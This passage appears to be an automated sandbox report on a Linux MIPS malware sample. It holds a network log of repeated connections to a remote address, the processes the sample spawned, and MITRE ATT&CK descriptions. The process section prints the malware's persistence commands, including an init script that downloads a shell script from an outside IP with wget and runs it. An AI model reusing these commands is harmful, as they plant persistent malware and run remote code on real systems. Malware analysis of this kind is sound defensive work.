Dec 24, 2024 09:44:20.484069109 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:20.603823900 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:20.603988886 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:20.604052067 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:20.723798990 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:21.109941959 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:21.272602081 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:21.729243994 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:21.729593039 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:22.111630917 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:22.231390953 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:22.231774092 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:22.231935024 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:22.351464987 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:22.738168001 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:22.900584936 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:23.368005991 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:23.368163109 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:23.739897966 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:23.859685898 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:23.859787941 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:23.859863043 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:23.979615927 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:24.364697933 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:24.524621010 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:24.994846106 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:24.995122910 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:25.366245031 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:25.485959053 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:25.486109972 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:25.486149073 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:25.605803967 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:25.990890026 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:26.152772903 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:26.616812944 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:26.617070913 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:26.992505074 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:27.112663031 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:27.112906933 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:27.112906933 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:27.232635021 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:27.617918968 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:27.780611038 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:28.239428997 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:28.239655018 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:28.619497061 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:28.739310026 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:28.739535093 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:28.739535093 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:28.859232903 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:29.244947910 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:29.408550024 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:29.865056992 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:29.865340948 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:30.246655941 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:30.366381884 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:30.366780043 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:30.366780043 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:30.486526966 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:30.872330904 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:31.032524109 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:31.491787910 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:31.492121935 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:31.874006987 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:31.993654013 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:31.993870020 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:31.993870020 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:32.113879919 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:32.499430895 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:32.660655022 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:33.109692097 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:33.109899044 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:33.500653028 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:33.620513916 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:33.620661020 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:33.620820999 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:33.740331888 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:34.125658035 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:34.292586088 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:34.750262976 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:34.750550032 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:35.127214909 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:35.246926069 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:35.247047901 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:35.247215986 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:35.369004965 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:35.752490997 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:35.918394089 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:36.367127895 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:36.367360115 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:36.754297972 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:36.874136925 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:36.874339104 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:36.874521017 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:36.994086027 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:37.378864050 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:37.540631056 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:38.010104895 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:38.010497093 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:38.380422115 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:38.500118017 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:38.500495911 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:38.500495911 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:38.620181084 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:39.005136967 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:39.168555975 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:39.621071100 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:39.621341944 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:40.006705046 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:40.126785994 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:40.127084970 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:40.127084970 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:40.246851921 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:40.632131100 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:40.792701960 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:41.264316082 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:41.264566898 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:41.633826971 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:41.753635883 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:41.753902912 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:41.753902912 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:41.873545885 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:42.259151936 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:42.420684099 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:42.877325058 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:42.877476931 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:43.260669947 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:43.380289078 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:43.380423069 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:43.380513906 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:43.500117064 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:43.886311054 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:44.048743010 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:44.503174067 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:44.503377914 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:44.887973070 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:45.007709980 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:45.007970095 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:45.007970095 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:45.128097057 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:45.513536930 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:45.680563927 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:46.142503977 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:46.142713070 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:46.514978886 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:46.634829998 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:46.634980917 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:46.635025024 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:46.754759073 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:47.139834881 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:47.300769091 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:47.772833109 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:47.773041010 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:48.141448021 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:48.261301041 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:48.261429071 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:48.261531115 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:48.381283998 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:48.768147945 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:48.928709030 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:49.385401011 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:49.385730982 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:49.769859076 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:49.889815092 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:49.890182972 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:49.890183926 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:50.009911060 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:50.395874977 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:50.560699940 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:51.020607948 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:51.020818949 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:51.397418976 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:51.517261028 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:51.517529964 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:51.517529964 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:51.637372017 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:52.023507118 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:52.188632965 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:52.630283117 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:52.630598068 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:53.025268078 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:53.145072937 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:53.145226002 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:53.145325899 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:53.265010118 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:53.651072025 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:53.816638947 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:54.258121967 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:54.258559942 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:54.654299974 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:54.774272919 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:54.774523973 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:54.774524927 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:54.894227982 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:55.280348063 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:55.440566063 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:55.891725063 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:55.892096996 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:56.281920910 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:56.401736975 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:56.401823997 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:56.401993990 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:56.521609068 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:56.908624887 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:57.068831921 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:57.529248953 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:57.529486895 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:57.910579920 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:58.030349016 CET	38242	60162	94.156.227.234	192.168.2.23
Dec 24, 2024 09:44:58.030469894 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:58.030679941 CET	60162	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 09:44:58.150394917 CET	38242	60162	94.156.227.234	192.168.2.23

System Behavior

Analysis Process: mipsel.nn.elf PID: 6236, Parent PID: 6163

General

Start time (UTC):	08:42:51
Start date (UTC):	24/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	/tmp/mipsel.nn.elf
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/mipsel.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mipsel.nn.elf'\n /tmp/mipsel.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping mipsel.nn.elf'\n killall mipsel.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mipsel.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/mipsel.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/mipsel.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/mipsel.nn.elf /etc/rc.d/S99mipsel.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/tmp/mipsel.nn.elf
Arguments:	-
File size:	5773336 bytes
MD5 hash:	0d6f61f82cf2f781c6eb0661071d42d9

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	08:42:52
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:42:53
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	08:42:53
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	08:42:53
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

